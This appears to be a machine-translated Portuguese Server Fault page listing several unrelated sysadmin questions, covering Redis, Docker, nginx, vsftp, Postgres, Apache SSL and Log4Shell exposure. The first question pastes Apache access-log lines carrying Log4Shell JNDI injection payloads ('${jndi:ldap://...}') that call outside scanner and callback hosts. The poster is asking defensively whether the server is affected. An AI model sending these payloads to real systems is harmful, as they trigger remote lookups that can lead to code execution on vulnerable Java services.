All perguntas(server)

O servidor web apache (apache2) usa log4j?

Eu tenho o Apache2 2.4.38 (debian) instalado no Raspberry Pi OS (64 bits) e encontrei alguns registros estranhos no meu log sobre CVE-2021-44228 de ( kryptoslogic-cve-2021-44228.comhoneypot/scanner), dataastatistics.com(offline & malicioso?) a8fvkc.dnslog.cnisto é)

O que eu deveria fazer agora?

• nada porque o apache2 não é afetado pelo CVE-2021-44228
• formate tudo e espere alguns dias antes de instalar uma versão corrigida
• "verifique" se existem novos arquivos .class e se não houver continue a operação (e use patches manuais comolog4j2.formatMsgNoLookups = TRUE
• algo mais

Histórico:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"

Eu tenho um cluster Redis com os seguintes nós:

192.168.0.14:6379 master (slots from 0 to 16383)
192.168.0.15:6379 slave (slots from 0 to 16383)
192.168.0.16:6379 master (without slots)

A documentação diz que qualquer nó pode redirecionar consultas para o nó correto. Mas não consigo redirecionar as solicitações do nó mestre 192.168.0.16:6379. Aqui está o que eu tentei:

192.168.0.16:6379> set myKey myValue
(error) MOVED 16281 192.168.0.14:6379
192.168.0.16:6379> get myKey
(error) MOVED 16281 192.168.0.14:6379

Não escreve nem lê. Quando tento obter "myKey" de 192.168.0.14:6379, ele mostra o seguinte:

127.0.0.1:6379> get myKey
(nil)

O que há de errado com meus pedidos? Estou usando o servidor redis versão 3.2.5

É extremamente comum que RFCs sejam citados em apoio a opiniões (incluindo perguntas e respostas sobre falhas de servidor), mas o funcionário médio de TI não entende muito bem quais RFCs definem padrões e quais são puramente informativos. Isso não deveria ser uma surpresa: os administradores de sistema de todos os níveis de experiência geralmente evitam olhar para os RFCs, a menos que não tenham escolha a não ser fazê-lo.

Em um site como o nosso, é extremamente importante não perpetuar mal-entendidos comuns em nossas respostas votadas. Usuários aleatórios que navegam nos mecanismos de pesquisa vão presumir que os votos positivos sem comentários contestados são indicadores suficientes de verificação. Recentemente, me deparei com uma resposta de 2011, deixando claro que isso definitivamente não está sendo detectado em alguns casos, pois votamos positivamente e provavelmente justifica alguns esforços para informar nossa comunidade e a Internet em geral.

Portanto, sem mais delongas, como diferenciar entre um RFC que pode ser citado como um padrão da Internet e um que é puramente informativo?

A docker-compose runreferência afirma que tem a --rmopção de

Remova o recipiente após a execução.

Quero tornar isso um runcomportamento padrão para alguns dos serviços que especifico em docker-compose.yml.

Então, as perguntas são :

1. Pode de alguma forma ser especificado em docker-compose.yml?
2. Se puder, como posso fazer isso?

( INB4 "Use bash aliases, Luke!" : É claro que posso impor isso fora docker-compose.ymldefinindo algum bash alias como alias docker-compose-run='docker-compose run --rm', mas estou interessado em como posso impor isso exatamente por meio docker-compose.ymlde , não de alguma forma externa.)

Meu objetivo é limitar o acesso aos contêineres docker a apenas alguns endereços IP públicos. Existe um processo simples e repetível para atingir meu objetivo? Entendendo apenas o básico do iptables enquanto uso as opções padrão do Docker, estou achando muito difícil.

Eu gostaria de executar um contêiner, torná-lo visível para a Internet pública, mas permitir apenas conexões de hosts selecionados. Eu esperaria definir uma política INPUT padrão de REJECT e permitir apenas conexões de meus hosts. Mas as regras e cadeias NAT do Docker atrapalham e minhas regras INPUT são ignoradas.

Alguém pode fornecer um exemplo de como atingir meu objetivo, considerando as seguintes suposições?

• Hospede o IP público 80.80.80.80 na eth0
• Hospede IP privado 192.168.1.10 em eth1
• docker run -d -p 3306:3306 mysql
• Bloquear todas as conexões com o host/container 3306, exceto dos hosts 4.4.4.4 e 8.8.8.8

Fico feliz em vincular o contêiner apenas ao endereço IP local, mas precisaria de instruções sobre como configurar as regras de encaminhamento do iptables adequadamente, que sobrevivem ao processo do docker e às reinicializações do host.

Obrigado!

Estou trabalhando em um manual para unir sistemas Linux ao Active Directory. Não consigo encontrar uma maneira de converter o valor de ansible_hostname em maiúsculas. Um dos comandos que preciso executar requer que o nome do host seja fornecido em letras maiúsculas.

Eu quero parar o Nginx, mas ele falha assim.

$ sudo service nginx stop
Stopping nginx:                                            [FAILED]

E nginx.confisso define o lugar do nginx.pid ter uma linha.

# /etc/nginx/nginx.conf
pid        /var/run/nginx.pid;

Mas não há nginx.pidno diretório /var/run/.

locate nginx.pidmostra esta saída.

/var/run/nginx.pid 
/var/run/nginx.pid.oldbin

Mas depois updatedbnão há correspondência para a pesquisa. Estou usando nginx/1.4.4 em CentOS release 6.5 (Final).

O que devo fazer para parar o daemon nginx?

Editar 2014/01/07

Esta é a saída de ps -ef | grep nginx, parece que o daemon nginx ainda está em execução.

ironsand 17065 16933  0 15:55 pts/0    00:00:00 grep --color nginx
root     19506     1  0  2013 ?        00:00:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
ironsand 19507 19506  0  2013 ?        00:00:25 nginx: worker process  

E sudo service nginx restartdá esse erro. Acho que nginxnão inicia porque o velho ainda está vivo. E /var/log/nginx/error.log-2014017contém também este erro.

Stopping nginx:                                            [FAILED]
Starting nginx: nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] still could not bind()
                                                           [FAILED]

Eu preciso dar periodicamente acesso temporário e limitado a vários diretórios em um servidor linux CentOS que tenha o vsftp instalado.

Eu criei um usuário usando useradd [user_name]e dei a eles uma senha usando passwd [password].

Eu criei um diretório /var/ftpe, em seguida, vinculo-o ao diretório ao qual desejo limitar o acesso.

O que mais preciso fazer especificamente para garantir que, quando esse usuário fizer login no FTP, ele só tenha acesso a esse diretório, por favor?

Digamos que você esteja vendo esta mensagem:

FATAL:  Ident authentication failed for user "..."

Quais são as causas desta mensagem de erro?

Preciso configurar meu VirtualHost no Apache para servir em http e https (usando portas padrão)

Se eu habilitar o SSL Engine (conforme abaixo) - recebo um erro na porta 80.

A razão é que partes do site precisam ser SSL, mas outras não. Como posso servir tanto http + https no site?

Aqui está o meu arquivo de host virtual ....

NameVirtualHost *

<VirtualHost *>
        ServerAdmin webmaster@localhost
        ServerName mysite.co.uk
        DocumentRoot /var/www/mysite/public
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/mysite/public>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>

        ErrorLog /var/log/apache2/error.log

        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn

        CustomLog /var/log/apache2/access.log combined
        ServerSignature On

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

     #SSL STUFF...
      SSLEngine on
      SSLCertificateFile /etc/apache2/crts/mysite.crt
      SSLCertificateKeyFile /etc/apache2/crts/mysite.key
      SSLCertificateChainFile /etc/apache2/crts/DigiCertCA.crt


</VirtualHost>